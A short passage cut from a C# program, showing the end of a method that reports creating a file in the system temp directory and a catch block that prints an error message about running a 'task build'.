            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}